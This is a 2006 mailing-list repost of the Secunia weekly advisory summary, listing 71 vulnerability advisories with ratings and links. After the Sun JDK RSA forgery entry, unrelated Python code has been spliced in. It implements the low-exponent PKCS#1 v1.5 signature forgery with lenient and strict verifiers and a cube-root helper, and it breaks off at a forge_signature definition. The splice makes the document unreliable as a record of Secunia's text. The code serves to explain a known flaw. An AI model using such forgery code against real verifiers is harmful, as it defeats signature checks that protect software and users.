[ISN] Secunia Weekly Summary - Issue: 2006-40

From: InfoSec News (alerts@private)
Date: Thu Oct 05 2006 - 23:30:30 PDT


========================================================================

                  The Secunia Weekly Advisory Summary                  
                        2006-09-28 - 2006-10-05                        

                       This week: 71 advisories                        

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

Secunia Corporate Website has been Released

Learn more about what Secunia can offer you and your company, see and
download detailed product descriptions, and view comprehensive flash
presentations of both our products and corporate profile.

Visit the Secunia Corporate Website:
http://corporate.secunia.com/


Secunia Vulnerability and Advisory Portal has been Updated

Our publicly available Vulnerability and Advisory Portal
secunia.com has been updated with improved accessibility and usability,
enhanced features, and improved search capabilities along with
availability of extensive product reports.

Over the years, the Secunia brand has become synonymous with credible,
accurate, and reliable vulnerability intelligence and our services
are used by more than 5 million unique users every year at secunia.com.

Visit the Secunia Vulnerability and Advisory Portal:
http://secunia.com/

========================================================================
2) This Week in Brief:

Tom Ferris has reported a vulnerability in Skype for Mac, which
potentially can be exploited by malicious people to compromise a
user's system.

The vendor has released an updated version that corrects this
vulnerability.

References:
http://secunia.com/SA22185

 --
 
Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.

Please refer to the referenced Secunia advisory for a comprehensive
listing of the issues corrected with this update.

References:
http://secunia.com/SA22187

 --

VIRUS ALERTS:

During the past week Secunia collected 196 virus descriptions from the
Antivirus vendors. However, none were deemed MEDIUM risk or higher
according to the Secunia assessment scale.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1.  [SA22159] Microsoft Windows Shell Code Execution Vulnerability
2.  [SA22127] Microsoft PowerPoint Code Execution Vulnerability
3.  [SA21910] Internet Explorer daxctle.ocx "KeyFrame()" Method
              Vulnerability
4.  [SA21906] Mozilla Firefox Multiple Vulnerabilities
5.  [SA21989] Microsoft Vector Graphics Rendering Library Buffer
              Overflow
6.  [SA22173] OpenSSH Signal Handling Vulnerability
7.  [SA22130] OpenSSL Multiple Vulnerabilities
8.  [SA20153] Microsoft Word Malformed Object Pointer Vulnerability
9.  [SA22187] Mac OS X Security Update Fixes Multiple Vulnerabilities
10. [SA22185] Skype URI Argument Handling Format String Vulnerability

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA22249] IBM Rational RequisitePro OpenSSL Vulnerability
[SA22232] OpenVPN Multiple Vulnerabilities
[SA22179] MailEnable Multiple Vulnerabilities
[SA22244] GroupWise Messenger Blowfish Zero-Sized Strings Denial of
Service
[SA22229] CA Unicenter Web Service Distributed Management Directory
Traversal
[SA22224] OfficeScan Corporate Edition "ATXCONSOLE.OCX" Format String
Vulnerability
[SA22222] McAfee ePolicy Orchestrator / ProtectionPilot Source Header
Buffer Overflow
[SA22234] Kerio Personal Firewall Hooked Functions Denial of Service

UNIX/Linux:
[SA22259] Mandriva update for ntp
[SA22245] Mandriva update for openssh
[SA22240] Debian update for openssl
[SA22236] FreeBSD update for openssh
[SA22220] rPath update for openssl
[SA22216] Kolab Server Multiple Vulnerabilities
[SA22212] Mandriva update for openssl
[SA22210] Ubuntu update for firefox
[SA22208] Ubuntu update for openssh
[SA22207] Slackware update for openssl
[SA22203] Mandriva update for gstreamer-ffmpeg
[SA22202] GStreamer FFmpeg Plug-in Multiple Buffer Overflows
[SA22201] Mandriva update for mplayer
[SA22200] Mandriva update for xine-lib
[SA22199] Gentoo update for dokuwiki
[SA22195] Gentoo update for mozilla-firefox
[SA22193] rPath update for openssl
[SA22191] Mandriva update for libmusicbrainz
[SA22190] HP-UX Ignite-UX Server Unspecified Vulnerability
[SA22187] Mac OS X Security Update Fixes Multiple Vulnerabilities
[SA22186] Red Hat update for openssl
[SA22185] Skype URI Argument Handling Format String Vulnerability
[SA22183] Red Hat update for openssh
[SA22181] xine-lib FFmpeg Multiple Buffer Overflow Vulnerabilities
[SA22180] FFmpeg Multiple Buffer Overflow Vulnerabilities
[SA22260] Mandriva update for MySQL
[SA22239] Debian update for cscope
[SA22227] Debian update for mailman
[SA22226] Sun Solaris RSA Signature Forgery Vulnerability
[SA22219] rPath update for openldap
[SA22205] Ubuntu update for gdb
[SA22243] Debian update for migrationtools
[SA22223] IBM Informix Dynamic Server Insecure Temporary File Creation
[SA22213] IBM AIX acctctl Privilege Escalation Vulnerability

Other:


Cross Platform:
[SA22261] Drupal IMCE Module Multiple Vulnerabilities
[SA22256] Minerva "phpbb_root_path" File Inclusion Vulnerability
[SA22242] HAMweather "do_parse_code" Command Injection Vulnerability
[SA22231] BasiliX "BSX_LIBDIR" File Inclusion Vulnerabilities
[SA22214] Forum82 "repertorylevel" File Inclusion Vulnerabilities
[SA22209] PowerPortal "file_name[]" File Inclusion Vulnerability
[SA22198] Mandriva update for ffmpeg
[SA22196] Red Hat update for openssh
[SA22194] Travelsized CMS "setup_folder" File Inclusion Vulnerability
[SA22192] DokuWiki Denial of Service and Command Injection
[SA22184] VideoDB "config[pdf_module]" File Inclusion Vulnerability
[SA22182] MPlayer FFmpeg Multiple Buffer Overflow Vulnerabilities
[SA22178] phpMyWebmin File Inclusions and Information Disclosure
[SA22177] phpBB XS "phpbb_root_path" File Inclusion Vulnerability
[SA22262] IBM WebSphere Application Server Apache mod_rewrite
Vulnerability
[SA22257] Taskjitsu "key" SQL Injection Vulnerability
[SA22241] OlateDownload Script Insertion and SQL Injection
[SA22238] OpenBiblio Local File Inclusion and SQL Injection
[SA22206] Intoto iGateway VPN / SSL-VPN Denial of Service
Vulnerability
[SA22176] DeluxeBB "templatefolder" File Inclusion Vulnerability
[SA22255] net2ftp "username" Cross-Site Scripting Vulnerability
[SA22248] TeraStation HD-HTGL Series Cross-Site Request Forgery
[SA22215] Mercury SiteScope Multiple Script Insertion Vulnerabilities
[SA22211] WWWthreads "Cat" Cross-Site Scripting Vulnerabilities
[SA22204] Sun Java JDK / SDK RSA Signature Forgery Vulnerability
[SA22197] PostNuke "hits" SQL Injection Vulnerability
[SA22188] phpBB "avatar_path" PHP Code Execution Vulnerability
[SA22235] PHP "open_basedir" Symlink Security Bypass Vulnerability

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA22249] IBM Rational RequisitePro OpenSSL Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-04

IBM has acknowledged a vulnerability in Rational RequisitePro
RequisiteWeb, which can be exploited by malicious people to cause a DoS
(Denial of Service) or to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22249/

 --

[SA22232] OpenVPN Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

Some vulnerabilities have been reported in OpenVPN, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22232/

 --

[SA22179] MailEnable Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

Some vulnerabilities have been reported in MailEnable, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22179/

 --

[SA22244] GroupWise Messenger Blowfish Zero-Sized Strings Denial of
Service

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-10-03

A vulnerability has been reported in GroupWise Messenger, which can be
exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/22244/

 --

[SA22229] CA Unicenter Web Service Distributed Management Directory
Traversal

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of system information, Exposure of sensitive
information
Released:    2006-10-04

A vulnerability has been reported in CA Unicenter Web Services
Distributed Management (WSDM), which can be exploited by malicious
people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/22229/

 --

[SA22224] OfficeScan Corporate Edition "ATXCONSOLE.OCX" Format String
Vulnerability

Critical:    Moderately critical
Where:       From local network
Impact:      DoS, System access
Released:    2006-10-02

A vulnerability has been reported in Trend Micro OfficeScan Corporate
Edition, which can be exploited by malicious people to potentially
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/22224/

 --

[SA22222] McAfee ePolicy Orchestrator / ProtectionPilot Source Header
Buffer Overflow

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2006-10-02

A vulnerability has been reported in McAfee ProtectionPilot and McAfee
ePolicy Orchestrator, which can be exploited by malicious people to
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22222/

 --

[SA22234] Kerio Personal Firewall Hooked Functions Denial of Service

Critical:    Not critical
Where:       Local system
Impact:      DoS
Released:    2006-10-02

David Matousek has reported some vulnerabilities in Kerio Personal
Firewall, which can be exploited by malicious, local users to cause a
DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/22234/


UNIX/Linux:--

[SA22259] Mandriva update for ntp

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

Mandriva has issued an update for ntp. This fixes some vulnerabilities,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22259/

 --

[SA22245] Mandriva update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-04

Mandriva has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22245/

 --

[SA22240] Debian update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

Debian has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22240/

 --

[SA22236] FreeBSD update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      System access, DoS
Released:    2006-10-02

FreeBSD has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22236/

 --

[SA22220] rPath update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

rPath has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22220/

 --

[SA22216] Kolab Server Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-04

Some vulnerabilities have been reported in Kolab Server, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22216/

 --

[SA22212] Mandriva update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

Mandriva has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22212/

 --

[SA22210] Ubuntu update for firefox

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Spoofing, DoS,
System access
Released:    2006-10-04

Ubuntu has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
man-in-the-middle, spoofing, and cross-site scripting attacks, and
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/22210/

 --

[SA22208] Ubuntu update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

Ubuntu has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22208/

 --

[SA22207] Slackware update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Slackware has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22207/

 --

[SA22203] Mandriva update for gstreamer-ffmpeg

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for gstreamer-ffmpeg. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22203/

 --

[SA22202] GStreamer FFmpeg Plug-in Multiple Buffer Overflows

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in GStreamer FFmpeg Plug-in,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22202/

 --

[SA22201] Mandriva update for mplayer

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for mplayer. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22201/

 --

[SA22200] Mandriva update for xine-lib

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for xine-lib. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22200/

 --

[SA22199] Gentoo update for dokuwiki

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Gentoo has issued an update for dokuwiki. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22199/

 --

[SA22195] Gentoo update for mozilla-firefox

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Spoofing, DoS,
System access
Released:    2006-09-29

Gentoo has issued an update for mozilla-firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service), conduct man-in-the-middle, spoofing, and
cross-site scripting attacks, and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22195/

 --

[SA22193] rPath update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

rPath has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22193/

 --

[SA22191] Mandriva update for libmusicbrainz

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for libmusicbrainz. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22191/

 --

[SA22190] HP-UX Ignite-UX Server Unspecified Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-03

A vulnerability has been reported in HP-UX, which can be exploited by
malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22190/

 --

[SA22187] Mac OS X Security Update Fixes Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Spoofing, Exposure of sensitive
information, Privilege escalation, DoS, System access
Released:    2006-09-29

Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.

Full Advisory:
http://secunia.com/advisories/22187/

 --

[SA22186] Red Hat update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Red Hat has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22186/

 --

[SA22185] Skype URI Argument Handling Format String Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-03

Tom Ferris has reported a vulnerability in Skype for Mac, which
potentially can be exploited by malicious people to compromise a user's
system.

Full Advisory:
http://secunia.com/advisories/22185/

 --

[SA22183] Red Hat update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Red Hat has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22183/

 --

[SA22181] xine-lib FFmpeg Multiple Buffer Overflow Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in xine-lib, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22181/

 --

[SA22180] FFmpeg Multiple Buffer Overflow Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in FFmpeg, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22180/

 --

[SA22260] Mandriva update for MySQL

Critical:    Moderately critical
Where:       From local network
Impact:      DoS, System access
Released:    2006-10-03

Mandriva has issued an update for MySQL. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22260/

 --

[SA22239] Debian update for cscope

Critical:    Less critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

Debian has issued an update for cscope. This fixes some
vulnerabilities, which potentially can be exploited by malicious people
to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22239/

 --

[SA22227] Debian update for mailman

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting, Spoofing
Released:    2006-10-04

Debian has issued an update for mailman. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and phishing attacks.

Full Advisory:
http://secunia.com/advisories/22227/

 --

[SA22226] Sun Solaris RSA Signature Forgery Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-10-04

Sun has acknowledged a vulnerability in various products included in
Solaris, which potentially can be exploited by malicious people to
bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/22226/

 --

[SA22219] rPath update for openldap

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-10-02

rPath has issued an update for openldap. This fixes a security issue,
which can be exploited by malicious users to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/22219/

 --

[SA22205] Ubuntu update for gdb

Critical:    Less critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

Ubuntu has issued an update for gdb. This fixes some vulnerabilities,
which can be exploited by malicious, local users to gain escalated
privileges or malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22205/

 --

[SA22243] Debian update for migrationtools

Critical:    Less critical
Where:       Local system
Impact:      Exposure of sensitive information
Released:    2006-10-02

Debian has issued an update for migrationtools. This fixes a
vulnerability, which can be exploited by malicious, local users to
disclose potentially sensitive information and perform certain actions
with escalated privileges on a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22243/

 --

[SA22223] IBM Informix Dynamic Server Insecure Temporary File Creation

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-10-03

Larry Cashdollar has discovered a vulnerability in IBM Informix Dynamic
Server, which can be exploited by malicious, local users to perform
certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/22223/

 --

[SA22213] IBM AIX acctctl Privilege Escalation Vulnerability

Critical:    Not critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-10-02

A vulnerability has been reported in IBM AIX, which can be exploited by
malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/22213/


Other:


Cross Platform:--

[SA22261] Drupal IMCE Module Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Manipulation of data, System access
Released:    2006-10-03

Some vulnerabilities have been reported in the IMCE Module for Drupal,
which can be exploited by malicious users to delete files or compromise
a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22261/

 --

[SA22256] Minerva "phpbb_root_path" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-03

SHiKaA has reported a vulnerability in Minerva, which can be exploited
by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22256/

 --

[SA22242] HAMweather "do_parse_code" Command Injection Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-03

Some vulnerabilities have been reported in HAMweather, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22242/

 --

[SA22231] BasiliX "BSX_LIBDIR" File Inclusion Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-02

Kacper has reported some vulnerabilities in BasiliX, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22231/

 --

[SA22214] Forum82 "repertorylevel" File Inclusion Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-02

Silahsiz Kuvvetler has discovered some vulnerabilities in Forum82,
which can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22214/

 --

[SA22209] PowerPortal "file_name[]" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-02

v1per-haCker has discovered a vulnerability in PowerPortal, which can
be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22209/

 --

[SA22198] Mandriva update for ffmpeg

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for ffmpeg. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22198/

 --

[SA22196] Red Hat update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Privilege escalation, DoS, System access
Released:    2006-09-29

Red Hat has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious, local users to
perform certain actions with escalated privileges, and by malicious
people to bypass certain security restrictions, cause a DoS (Denial of
Service), and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22196/

 --

[SA22194] Travelsized CMS "setup_folder" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-04

Kacper has discovered a vulnerability in Travelsized CMS, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22194/

 --

[SA22192] DokuWiki Denial of Service and Command Injection

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in DokuWiki, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22192/

 --

[SA22184] VideoDB "config[pdf_module]" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-02

Kacper has discovered a vulnerability in VideoDB, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22184/

 --

[SA22182] MPlayer FFmpeg Multiple Buffer Overflow Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in MPlayer, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22182/

 --

[SA22178] phpMyWebmin File Inclusions and Information Disclosure

Critical:    Highly critical
Where:       From remote
Impact:      Exposure of system information, System access
Released:    2006-09-29

Some vulnerabilities and two weaknesses have been discovered in
phpMyWebmin, which can be exploited by malicious people to disclose
system information and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22178/

 --

[SA22177] phpBB XS "phpbb_root_path" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-09-29

Solpot has discovered a vulnerability in phpBB XS, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22177/

 --

[SA22262] IBM WebSphere Application Server Apache mod_rewrite
Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

IBM has acknowledged a vulnerability in WebSphere Application Server,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/22262/

 --

[SA22257] Taskjitsu "key" SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-10-04

A vulnerability has been reported in Taskjitsu, which can be exploited
by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/22257/

 --

[SA22241] OlateDownload Script Insertion and SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-10-02

Hessam-x has reported some vulnerabilities in OlateDownload, which can
be exploited by malicious people to conduct script insertion and SQL
injection attacks.

Full Advisory:
http://secunia.com/advisories/22241/

 --

[SA22238] OpenBiblio Local File Inclusion and SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data, Exposure of sensitive information
Released:    2006-10-02

Some vulnerabilities have been reported in OpenBiblio, which can be
exploited by malicious people to disclose potentially sensitive
information, and by malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/22238/

 --

[SA22206] Intoto iGateway VPN / SSL-VPN Denial of Service
Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-10-02

A vulnerability has been reported in Intoto iGateway VPN and Intoto
iGateway SSL-VPN, which can be exploited by malicious people to cause a
DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/22206/

 --

[SA22176] DeluxeBB "templatefolder" File Inclusion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-10-02

r0ut3r has reported a vulnerability in DeluxeBB, which can be exploited
by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/22176/

 --

[SA22255] net2ftp "username" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-10-03

securfrog has discovered a vulnerability in net2ftp, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/22255/

 --

[SA22248] TeraStation HD-HTGL Series Cross-Site Request Forgery

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-10-03

A vulnerability has been reported in TeraStation HD-HTGL Series, which
can be exploited by malicious people to conduct cross-site request
forgery attacks.

Full Advisory:
http://secunia.com/advisories/22248/

 --

[SA22215] Mercury SiteScope Multiple Script Insertion Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-10-03

Ozkan Aziz has reported some vulnerabilities in Mercury SiteScope,
which can be exploited by malicious users to conduct script insertion
attacks.

Full Advisory:
http://secunia.com/advisories/22215/

 --

[SA22211] WWWthreads "Cat" Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-10-02

Root3r_H3ll has reported some vulnerabilities in WWWthreads, which can
be exploited by malicious people to conduct cross-site scripting
attacks.

Full Advisory:
http://secunia.com/advisories/22211/

 --

[SA22204] Sun Java JDK / SDK RSA Signature Forgery Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-10-04

Sun has acknowledged a vulnerability in Sun JDK / SDK, which
potentially can be exploited by malicious people to bypass certain
security restrictions.

Full Advisory:
http://secunia.com/advisories/22204/
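
As an added example (not Sun's code and not taken from the advisory), the block below shows the low-exponent PKCS#1 v1.5 forgery class that Daniel Bleichenbacher presented in 2006; that this advisory belongs to that class is an assumption made here, suggested only by the title. A verifier that walks the padding and then ignores whatever follows the hash accepts a "signature" computed as a plain integer cube root, while a verifier that rebuilds the one valid encoded block for the key size and compares all of it rejects the same value. The modulus N is a constructed placeholder, not a real key: the forgery needs only the public exponent 3 and a modulus larger than the forged cube, so no private key is involved.

```python
import hashlib
import hmac

# DER DigestInfo prefix for SHA-1 (RFC 3447, section 9.2, note 1).
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")
E = 3

# Constructed placeholder modulus (3072 bits, odd). It is NOT a real RSA
# modulus and no private key exists for it; the forgery never needs one.
N = (1 << 3071) | 1


def digest_info(message: bytes) -> bytes:
    return SHA1_DIGESTINFO + hashlib.sha1(message).digest()


def verify_lenient(n, e, sig, message):
    """Buggy check: parse 00 01 FF..FF 00 DigestInfo||hash and stop there.
    Bytes after the hash are never examined, which is the flaw exploited."""
    k = (n.bit_length() + 7) // 8
    if not 0 < sig < n:
        return False
    em = pow(sig, e, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:   # at least 8 x 0xFF, then 0x00
        return False
    d = digest_info(message)
    return em[i + 1:i + 1 + len(d)] == d          # trailing garbage ignored


def verify_strict(n, e, sig, message):
    """Correct check: rebuild the only valid block for this key size and
    compare the whole thing, so the padding length is enforced too."""
    k = (n.bit_length() + 7) // 8
    if not 0 < sig < n:
        return False
    em = pow(sig, e, n).to_bytes(k, "big")
    d = digest_info(message)
    expected = b"\x00\x01" + b"\xff" * (k - 3 - len(d)) + b"\x00" + d
    return hmac.compare_digest(em, expected)


def icbrt(x):
    """Floor of the integer cube root, by Newton iteration on integers."""
    r = 1 << ((x.bit_length() + 2) // 3)   # starts at or above the root
    while True:
        y = (2 * r + x // (r * r)) // 3
        if y >= r:
            return r
        r = y


def forge_signature(n, message):
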